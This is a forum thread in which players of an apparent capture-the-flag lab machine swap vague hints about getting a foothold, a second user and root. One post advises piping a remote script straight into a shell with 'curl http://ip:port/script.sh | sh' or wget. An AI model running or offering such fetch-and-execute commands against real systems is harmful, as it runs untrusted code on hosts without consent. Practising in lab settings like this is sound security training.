i will @benjamin2000
For anyone who reads this: use mktemp -d to create a temporal directory and stop downloading your scripts on /home directory
@Feror said:
For anyone who reads this: use
mktemp -dto create a temporal directory and stop downloading your scripts on /home directory
Thereās no need to even download the scripts to disk, you can simply curl http://ip:port/script.sh | sh (or wget -O - ... when curl isnāt available)
So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.
Had to use a local tool Iād never heard of before. Feel free to PM for nudges but let me know what youāve already tried. Plenty of hints for foothold and first user through the thread
Really funny box, if anyone get stuck on log files, update your enum script version and try again(it took my 2 hour 
)
Thanks for this box 
Rooted
Type your comment> @tsheva said:
Type your comment> @0xstain said:
need a hint with root, going through /var/log but i canāt get clue to root this box.
Are you going through /var/log with the user with user.txt in his home folder?
yes i have user not www-data.
Hello friends I hope that you are doing great out there. Iām stuck with root. When I try to run the script c******* run-script command I was ended up with this error Script ācommandā is not defined in this package. Any solution or hint appreciated.
nice box, finally rooted! If you need nudge, can PM me
Finally rooted! if anyone needs a nudge PM me
fun box
Finally made it. Feel free to PM for a nudge.
rooted, need a nudge? just pm.
Rooted now, learned some things doing this box!
What a traumatic machineā¦ I was soo frustrated, that I was going to skip this machine. Thanks to @IvanV who motivated me to go on.
Lesson learned: Even when you think you know how to retrieve things, GOOGLE IT!!! ?
Anyone do the user part manually?
I was able to escalate my privs on the webpage but I donāt fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advanced!
Rooted the machine, it was really fun box, learned alot.
PM for nudge, good luck
Rooted. The hardest part was definitely getting that 2nd user. Foothold wasnāt too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. Thatās what did it for me.
I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. Iām sure its got to be something even more simple than what Iām attemptingā¦
@Sc0rp10ne said:
I too am stuck on the foothold thing. I believe I found the small change I need to make I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. Iām sure its got to be something even more simple than what Iām attemptingā¦
It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.